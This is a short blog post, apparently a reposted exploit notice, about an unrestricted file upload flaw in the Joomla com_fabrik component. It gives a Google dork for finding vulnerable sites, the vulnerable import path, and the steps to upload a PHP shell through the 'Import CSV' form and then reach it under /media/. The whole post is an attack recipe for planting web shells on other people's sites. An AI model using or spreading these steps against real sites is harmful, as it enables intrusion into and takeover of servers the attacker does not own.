Tuesday, 22 January 2013

Joomla Remote Shell Upload Vulnerablities


Google Dork : inurl:index.php?option=com_fabrik or index.php?option=com_fabrik
Date : 14/09/2012
Exploit Author : D35m0nd142
Vendor Homepage : http://fabrikar.com/
Tested on : Mozilla Firefox on Ubuntu 12.04


Vulnerable path :
Code:

index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

--
In this webpage there is the possibility of upload any type of files (php,asp,html,jpg .. ) through the form "Import CSV".
--
Screenshot of the uploading page --> http://imageshack.us/photo/my-images/269/comfabrik.png/
--
After uploaded shell go to --> http://[target]/media/yourshell.php

0 comments:

Post a Comment